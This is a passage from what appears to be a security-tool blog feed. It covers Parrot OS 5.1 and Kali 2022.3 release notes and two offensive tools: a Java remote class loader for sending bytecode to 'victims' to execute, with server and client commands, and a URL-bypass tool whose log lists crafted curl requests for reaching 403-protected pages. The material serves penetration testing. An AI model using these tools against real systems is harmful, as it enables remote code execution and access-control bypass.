if we recommend to always update your version, it is also recommended
to do a backup and re-install the latest version to have a cleaner and
more reliable user experience, especially if you upgrade from a very old
version of parrot.</p>
<h2 style="text-align: left;">What's new in Parrot OS 5.1</h2>
<h3 style="text-align: left;">New kernel 5.18.</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">You can find all the infos about the new Kernel 5.18 by clickig on this <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-ea5huq" href="https://kernelnewbies.org/Linux_5.18#fprobe.2C_for_probing_multiple_functions_with_a_single_probe_handler">link</a>.</p>
<h3 style="text-align: left;">Updated docker containers</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Our docker offering has been revamped!
We now provide our dedicated <strong>parrot.run</strong> image registry along with the default <strong>docker.io</strong> one.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">All our images are now natively multiarch, and support amd64 and arm64 architectures.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Our containers offering was updated as well, and we are committed to further improve it.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Run <code>docker run --rm -ti --network host -v $PWD/work:/work parrot.run/core</code> and give our containers a try without having to install the system, or visit our <a class="MuiTypography-root MuiTypography-inherit MuiLink-root MuiLink-underlineAlways css-ea5huq" href="https://docs.parrotsec.org/docs/cloud/parrot-on-docker">Docker images page</a> to explore the other containers we offer.</p>
<h3 style="text-align: left;">Updated backports.</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Several
packages were updated and backported, like the new Golang 1.19 or
Libreoffice 7.4. This is part of our commitment to provide the latest
version of every most important software while choosing a stable LTS
release model.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">To make sure to have all the latest packages installed from our backports channel, use the following commands:</p>
<ul>
<li><code>sudo apt update</code></li>
<li><code>sudo apt full-upgrade -t parrot-backports</code></li>
</ul>
<h3 style="text-align: left;">System updates</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">The
system has received important updates to some opf its key packages,
like parrot-menu, which now provides additional launchers to our newly
imported tools; or parrot-core, which now provides a new firefox profile
with improved security hardening, plus some minor bugfixes to our zshrc
configuration.</p>
<h3 style="text-align: left;">Firefox profile overhault</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">As
mentioned earlier, our Firefox profile has received a major update that
significantly improves the overall privacy and security.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Our
bookmarks collection has been revamped, and now includes new resources,
including OSINT services, new learning sources and other useful
resources for hackers, developers, students and security researchers.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">We
have also boosted our effort to avoid Mozilla telemetry and bring
DuckDuckGo back as the default search engine, while we are exploring
other alternatives for the future.</p>
<h3 style="text-align: left;">Tools updates</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Most of our tools have received major version updates, especially our reverse engineering tools, like rizin and rizin-cutter.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Important updates involved metasploit, exploitdb and other popular tools as well.</p>
<h3 style="text-align: left;">New AnonSurf 4.0</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">The new AnonSurf 4 represents a major upgrade for our popular anonymity tool.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Anonsurf
is our in-house anonymity solution that routes all the system traffic
through TOR automatically without having to set up proxy settings for
each individua program, and preventing traffic leaking in most cases.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">The
new version provides significant fixes and reliability updates, fully
supports debian systems without the old resolvconf setup, has a new user
interface with improved system tray icon and settings dialog window,
and offers a better overall user experience.</p>
<h3 style="text-align: left;">Parrot IoT improvements</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Our
IoT version now implements significant performance improvements for the
various Raspberry Pi boards, and finally includes Wi-Fi support for the
Raspberry Pi 400 board.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">The
Parrot IoT offering has also been expanded, and it now offers Home and
Security editions as well, with a full MATE desktop environment exactly
like the desktop counterpart.</p>
<h3 style="text-align: left;">Architect Edition improvements</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">Our popular Architect Edition now implements some minor bugfixes and is more reliable than ever.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">The
Architect Edition is a special edition of Parrot that enables the user
to install a barebone Parrot Core system, and then offers a selection of
additional modules to further customize the system.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">You
can use Parrot Architect to install other desktop environments like
KDE, GNOME or XFCE, or to install a specific selection of tools.</p>
<h3 style="text-align: left;">New infrastructure powered by Parrot and Kubernetes</h3>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">The
Architect Edition is also used internally by the Parrot Engineering
Team to install Parrot Server Edition on all the servers that power our
infrastructure, which is officially 100% powered by Parrot and
Kubernetes.</p>
<p class="MuiTypography-root MuiTypography-body1 css-1meyl37" style="opacity: 1; padding-bottom: 20px; padding-top: 20px;">This
is a major change in the way we handle our infrastructure, which
enables us to implement better autoscaling, easier management, smaller
attack surface and an overall better network, with the improved
scalability and security we were looking for.</p><br /><br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://download.parrotsec.org/parrot/iso/4.7/" target="_blank">Download Parrot Security 5.1</a></span></b></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-18766080768045599782022-10-03T08:30:00.008-03:002022-10-03T08:30:00.290-03:00Java-Remote-Class-Loader - Tool to send Java bytecode to your victims to load and execute using Java ClassLoader together with Reflect API<h1 align="center" dir="auto"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjqbe2HDYDVxwhQXJc8nseuijMlm0-Dsr3zPALzOUbgLU1XUJ-hojss3deLf8oGSz703t1AqEL78YrOrIS61IfcpflmzjMfHn_blwBvu8aVlBtgWyfppjE3QBKvB62w5E04x4p054EG0--jEFzkEB_M6VF72LrvpLALNTJ-6LbMd5bVtPyl7n7JKeBeAA"><img alt="" border="0" height="282" id="BLOGGER_PHOTO_ID_7148294780622538178" src="https://blogger.googleusercontent.com/img/a/AVvXsEjqbe2HDYDVxwhQXJc8nseuijMlm0-Dsr3zPALzOUbgLU1XUJ-hojss3deLf8oGSz703t1AqEL78YrOrIS61IfcpflmzjMfHn_blwBvu8aVlBtgWyfppjE3QBKvB62w5E04x4p054EG0--jEFzkEB_M6VF72LrvpLALNTJ-6LbMd5bVtPyl7n7JKeBeAA=w640-h282" width="640" /></a> <br /> </h1> <p dir="auto">This tool allows you to send Java <a href="https://www.kitploit.com/search/label/Bytecode" target="_blank" title="bytecode">bytecode</a> in the form of class files to your clients (or potential targets) to load and execute using Java ClassLoader together with Reflect API. The <a href="https://www.kitploit.com/search/label/Client" target="_blank" title="client">client</a> receives the class file from the server and return the respective execution output. Payloads must be written in Java and compiled before starting the server.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h1 dir="auto">Features</h1> <ul dir="auto"> <li>Client-server architecture</li> <li>Remote loading of Java class files</li> <li>In-transit <a href="https://www.kitploit.com/search/label/Encryption" target="_blank" title="encryption">encryption</a> using ChaCha20 cipher</li> <li>Settings defined via args</li> <li>Keepalive mechanism to re-establish communication if server restarts</li> </ul> <h1 dir="auto">Installation</h1> <p dir="auto">Tool has been tested using OpenJDK 11 with JRE Java Package, both on <a href="https://www.kitploit.com/search/label/Windows" target="_blank" title="Windows">Windows</a> and Linux (zip portable version). Java version should be 11 or higher due to dependencies.</p> <p dir="auto"><a href="https://www.openlogic.com/openjdk-downloads" rel="nofollow" target="_blank" title="https://www.openlogic.com/openjdk-downloads">https://www.openlogic.com/openjdk-downloads</a></p> <h1 dir="auto">Usage</h1> <div class="highlight highlight-text-shell-session notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="$ java -jar java-class-loader.jar -help usage: Main -address <arg> address to connect (client) / to bind (server) -classfile <arg> filename of bytecode .class file to load remotely (default: Payload.class) -classmethod <arg> name of method to invoke (default: exec) -classname <arg> name of class (default: Payload) -client run as client -help print this message -keepalive keeps the client getting classfile from server every X seconds (default: 3 seconds) -key <arg> secret key - 256 bits in base64 format (if not specified it will generate a new one) -port <arg> port to connect (client) / to bind (server) -server run as server" dir="auto"><pre><code>$ java -jar java-class-loader.jar -help<br /><br />usage: Main<br /> -address <arg> address to connect (client) / to bind (server)<br /> -classfile <arg> filename of bytecode .class file to load remotely<br /> (default: Payload.class)<br /> -classmethod <arg> name of method to invoke (default: exec)<br /> -classname <arg> name of class (default: Payload)<br /> -client run as client<br /> -help print this message<br /> -keepalive keeps the client getting classfile from server every<br /> X seconds (default: 3 seconds)<br /> -key <arg> secret key - 256 bits in base64 format (if not<br /> specified it will generate a new one)<br /> -port <arg> port to connect (client) / to bind (server)<br /> -server run as server</code></pre></div> <h1 dir="auto">Example</h1> <p dir="auto">Assuming you have the following Hello World payload in the <code>Payload.java</code> file:</p> <div class="highlight highlight-source-java notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="//Payload.java public class <a title="Payload" href="https://www.kitploit.com/search/label/Payload">Payload</a> { public static String exec() { String output = ""; try { output = "Hello world from client!"; } catch (Exception e) { e.printStackTrace(); } return output; } }" dir="auto"><pre><code>//Payload.java<br />public class Payload {<br /> public static String exec() {<br /> String output = "";<br /> try {<br /> output = "Hello world from client!";<br /> } catch (Exception e) {<br /> e.printStackTrace();<br /> }<br /> return output;<br /> }<br />}</code></pre></div> <p dir="auto">Then you should compile and produce the respective <code>Payload.class</code> file.</p> <p dir="auto">To run the server process listening on port 1337 on all net interfaces:</p> <div class="highlight highlight-text-shell-session notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="$ java -jar java-class-loader.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.class Running as server Server running on 0.0.0.0:1337 Generated new key: TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=" dir="auto"><pre><code>$ java -jar java-class-loader.jar -server -address 0.0.0.0 -port 1337 -classfile Payload.class<br /><br />Running as server<br />Server running on 0.0.0.0:1337<br />Generated new key: TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=</code></pre></div> <p dir="auto">On the client side, you may use the same JAR package with the <code>-client</code> flag and use the symmetric key generated by server. Specify the server IP address and port to connect to. You may also change the class name and class method (defaults are <code>Payload</code> and <code>String exec()</code> respectively). Additionally, you can specify <code>-keepalive</code> to keep the client requesting class file from server while maintaining the connection.</p> <div class="highlight highlight-text-shell-session notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="$ java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 -key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ= Running as client Connecting to 192.168.1.73:1337 Received 593 bytes from server Output from invoked class method: Hello world from client! Sent 24 bytes to server" dir="auto"><pre><code>$ java -jar java-class-loader.jar -client -address 192.168.1.73 -port 1337 -key TOU3TLn1QsayL1K6tbNOzDK69MstouEyNLMGqzqNIrQ=<br /><br />Running as client<br />Connecting to 192.168.1.73:1337<br />Received 593 bytes from server<br />Output from invoked class method: Hello world from client!<br />Sent 24 bytes to server</code></pre></div> <h1 dir="auto">References</h1> <p dir="auto">Refer to <a href="https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/" rel="nofollow" target="_blank" title="https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/">https://vrls.ws/posts/2022/08/building-a-remote-class-loader-in-java/</a> for a blog post related with the development of this tool.</p> <ol dir="auto"> <li> <p dir="auto"><a href="https://github.com/rebeyond/Behinder" rel="nofollow" target="_blank" title="https://github.com/rebeyond/Behinder">https://github.com/rebeyond/Behinder</a></p> </li> <li> <p dir="auto"><a href="https://github.com/AntSwordProject/antSword" rel="nofollow" target="_blank" title="https://github.com/AntSwordProject/antSword">https://github.com/AntSwordProject/antSword</a></p> </li> <li> <p dir="auto"><a href="https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/" rel="nofollow" target="_blank" title="https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/">https://cyberandramen.net/2022/02/18/a-tale-of-two-shells/</a></p> </li> <li> <p dir="auto"><a href="https://www.sangfor.com/blog/cybersecurity/behinder-v30-analysis" rel="nofollow" target="_blank" title="https://www.sangfor.com/blog/cybersecurity/behinder-v30-analysis">https://www.sangfor.com/blog/cybersecurity/behinder-v30-analysis</a></p> </li> <li> <p dir="auto"><a href="https://xz.aliyun.com/t/2799" rel="nofollow" target="_blank" title="https://xz.aliyun.com/t/2799">https://xz.aliyun.com/t/2799</a></p> </li> <li> <p dir="auto"><a href="https://medium.com/@m01e/jsp-webshell-cookbook-part-1-6836844ceee7" rel="nofollow" target="_blank" title="https://medium.com/@m01e/jsp-webshell-cookbook-part-1-6836844ceee7">https://medium.com/@m01e/jsp-webshell-cookbook-part-1-6836844ceee7</a></p> </li> <li> <p dir="auto"><a href="https://venishjoe.net/post/dynamically-load-compiled-java-class/" rel="nofollow" target="_blank" title="https://venishjoe.net/post/dynamically-load-compiled-java-class/">https://venishjoe.net/post/dynamically-load-compiled-java-class/</a></p> </li> <li> <p dir="auto"><a href="https://users.cs.jmu.edu/bernstdh/web/common/lectures/slides_class-loaders_remote.php" rel="nofollow" target="_blank" title="https://users.cs.jmu.edu/bernstdh/web/common/lectures/slides_class-loaders_remote.php">https://users.cs.jmu.edu/bernstdh/web/common/lectures/slides_class-loaders_remote.php</a></p> </li> <li> <p dir="auto"><a href="https://www.javainterviewpoint.com/chacha20-poly1305-encryption-and-decryption/" rel="nofollow" target="_blank" title="https://www.javainterviewpoint.com/chacha20-poly1305-encryption-and-decryption/">https://www.javainterviewpoint.com/chacha20-poly1305-encryption-and-decryption/</a></p> </li> <li> <p dir="auto"><a href="https://openjdk.org/jeps/329" rel="nofollow" target="_blank" title="https://openjdk.org/jeps/329">https://openjdk.org/jeps/329</a></p> </li> <li> <p dir="auto"><a href="https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/ClassLoader.html" rel="nofollow" target="_blank" title="https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/ClassLoader.html">https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/ClassLoader.html</a></p> </li> <li> <p dir="auto"><a href="https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/reflect/Method.html" rel="nofollow" target="_blank" title="https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/reflect/Method.html">https://docs.oracle.com/en/java/javase/11/docs/api/java.base/java/lang/reflect/Method.html</a></p> </li> </ol> <br /><br /><div style="text-align: center;"><b><span style="font-size: x-large;"><a class="kiploit-download" href="https://github.com/joaovarelas/java-remote-class-loader" rel="nofollow" target="_blank" title="Download Java-Remote-Class-Loader">Download Java-Remote-Class-Loader</a></span></b></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-11510556451484901182022-08-11T02:08:00.003-04:002022-08-11T02:11:22.793-04:00Kali Linux 2022.3 - Penetration Testing and Ethical Hacking Linux Distribution<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbHClh2kvbaX_X8Dc86ZcAQSmWrfQypGElk6SGE_vNyFQNPOIMVQAksldW4kYpROJ8fckz-pHzqCFp8F8gOcqX2ddY_vfV-mQhb_UODttoxdCuC-VdhbgrZ8iabVUcytfPKCoOvESPOP939r84L2KvMwzGAEQVt3pVrgjt51fCZxL9aM7zGWH9-bpc/s1200/banner-2022.3-release.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="628" data-original-width="1200" height="334" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjbHClh2kvbaX_X8Dc86ZcAQSmWrfQypGElk6SGE_vNyFQNPOIMVQAksldW4kYpROJ8fckz-pHzqCFp8F8gOcqX2ddY_vfV-mQhb_UODttoxdCuC-VdhbgrZ8iabVUcytfPKCoOvESPOP939r84L2KvMwzGAEQVt3pVrgjt51fCZxL9aM7zGWH9-bpc/w640-h334/banner-2022.3-release.jpg" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><br /></div><p></p>
Time for another Kali Linux release! – Kali Linux 2022.3. This release has various impressive updates.<span><a name='more'></a></span><div><br /></div><div>
<p>The highlights for Kali’s 2022.3’s release:</p><ul><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-3-release/#kali-is-on-discord">Discord Server</a></strong> - Kali’s new community real-time chat option has launched!</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-3-release/#test-lab-environment">Test Lab Environment</a></strong> - Quickly create a test bed to learn, practice, and benchmark tools and compare their results</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-3-release/#kali-tools-documentation">Opening Kali-Tools Repo</a></strong> - We have opened up the Kali tools repository & are accepting your submissions!</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-3-release/#help-wanted">Help Wanted</a></strong> - We are looking for a Go developer to help us on an open-source project</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-3-release/#kali-nethunter-updates">Kali NetHunter Updates</a></strong> - New releases in our NetHunter store</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-3-release/#kali-for-virtual-machines">Virtual Machines Updates</a></strong> - New VirtualBox image format, weekly images, and build-scripts to build your own</li><li><strong><a href="https://www.kali.org/blog/kali-linux-2022-3-release/#new-tools-in-kali">New Tools In Kali</a></strong> - Would not be a release without some new tools!</li></ul><p><em>For more details, see the <a href="https://bugs.kali.org/changelog_page.php">bug tracker changelog</a>.</em></p><br />
<b>More info <a href="https://www.kali.org/blog/kali-linux-2022-3-release/" target="_blank">here</a>.</b><br /><br />
<br />
<div style="text-align: center;">
<b><span style="font-size: x-large;"><a class="kiploit-download" href="https://www.kali.org/get-kali/" rel="nofollow" target="_blank" title="Download Kali Linux">Download Kali Linux 2022.3</a></span></b></div></div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8317222231133660547.post-85806682051311281722022-07-13T08:30:00.004-04:002022-07-13T08:30:00.248-04:00Bypass-Url-Parser - Tool That Tests Many URL Bypasses To Reach A 40X Protected Page<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhdjAiwVNTJ_mp8hhpg1tSiUV4pPg6KW1ceU4DszQH_kNkJqVXShA7Hj9fzygTYaj7LtxmnMuuyDIQwWnHe8WPhQTICmZBxf27PPDzeVy0h5RFSj3YooR6g7tRn7Sg0qCe4ehzq5BywDq6rtdSLIS7_5loHWtA5pvnWCsIWAp3eSVhvTaF7IIogOs8/s967/bypass-url-parser.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="544" data-original-width="967" height="360" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhhdjAiwVNTJ_mp8hhpg1tSiUV4pPg6KW1ceU4DszQH_kNkJqVXShA7Hj9fzygTYaj7LtxmnMuuyDIQwWnHe8WPhQTICmZBxf27PPDzeVy0h5RFSj3YooR6g7tRn7Sg0qCe4ehzq5BywDq6rtdSLIS7_5loHWtA5pvnWCsIWAp3eSVhvTaF7IIogOs8/w640-h360/bypass-url-parser.png" width="640" /></a></div><p><br /></p> <p dir="auto">Tool that tests <code>MANY</code> url bypasses to reach a <code>40X protected page</code>.</p> <p dir="auto">If you wonder why this code is <code>nothing but a dirty curl wrapper</code>, here's why:</p> <ul dir="auto"> <li>Most of the python requests do url/path/parameter encoding/decoding, and I hate this.</li> <li>If I submit raw chars, I want raw chars to be sent.</li> <li>If I send a weird path, I want it weird, not normalized.</li> </ul> <p dir="auto">This is <code>surprisingly hard</code> to achieve in python without loosing all of the lib goodies like parsing, <a href="https://www.kitploit.com/search/label/SSL/TLS" target="_blank" title="ssl/tls">ssl/tls</a> encapsulation and so on. <br /> So, be like me, use <code>curl as a backend</code>, it's gonna be just fine.</p><span><a name='more'></a></span><p dir="auto"><br /></p> <h2 dir="auto">Setup for bypass.py</h2> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="# Deps sudo apt install -y bat curl virtualenv python3 # Tool virtualenv -p python3 .py3 source .py3/bin/activate pip install -r requirements.txt ./bypass-url-parser.py --url "http://127.0.0.1/juicy_403_endpoint/""><pre><code># Deps<br />sudo apt install -y bat curl virtualenv python3<br /># Tool<br />virtualenv -p python3 .py3<br />source .py3/bin/activate<br />pip install -r requirements.txt<br />./bypass-url-parser.py --url "http://127.0.0.1/juicy_403_endpoint/"</code></pre></div> <h2 dir="auto">Usage</h2> <div>Expected result <div><pre><code>2022-05-10 15:54:03 work bup[738125] INFO === Config ===<br />2022-05-10 15:54:03 work bup[738125] INFO debug: False<br />2022-05-10 15:54:03 work bup[738125] INFO url: http://thinkloveshare.com/api/jolokia/list<br />2022-05-10 15:54:03 work bup[738125] INFO outdir: /tmp/tmp48drf_ie-bypass-url-parser<br />2022-05-10 15:54:03 work bup[738125] INFO threads: 20<br />2022-05-10 15:54:03 work bup[738125] INFO timeout: 2<br />2022-05-10 15:54:03 work bup[738125] INFO headers: {}<br />2022-05-10 15:54:03 work bup[738125] WARNING Stage: generate_curls<br />2022-05-10 15:54:03 work bup[738125] INFO base_url: http://thinkloveshare.com<br />2022-05-10 15:54:03 work bup[738125] INFO base_path: /api/jolokia/list<br />2022-05-10 15:54:03 work bup[738125] WARNING Stage: run_curls<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; <a href="https://www.kitploit.com/search/label/Linux" target="_blank" title="Linux">Linux</a> x86_64 ) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'CONNECT' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'GET' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 S afari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'LOCK' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'OPTIONS' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PATCH' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: % {size_download}' -X 'POST' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'POUET' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'PUT' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACE' 'http://thinkloveshare.com/ api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'TRACK' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -X 'UPDATE' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 0.0.0.0' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: 127.0.0.1' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: localhost' 'http://thinkloveshare.com/api/jolokia/list'<br />2022-05-10 15:54:03 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' -H 'Access-Control-Allow-Origin: norealhost' 'http://thinkloveshare.com/api/jolokia/list'<br />[...]<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%252f%252f//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 'http://thinkloveshare.com//api/jolokia//%26//list'<br />2022-05-10 15:54:09 work bup[738125] INFO Current: curl -sS -kgi --path-as-is -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.41 Safari/537.36' -w '\nStatus: %{http_code}, Length: %{size_download}' 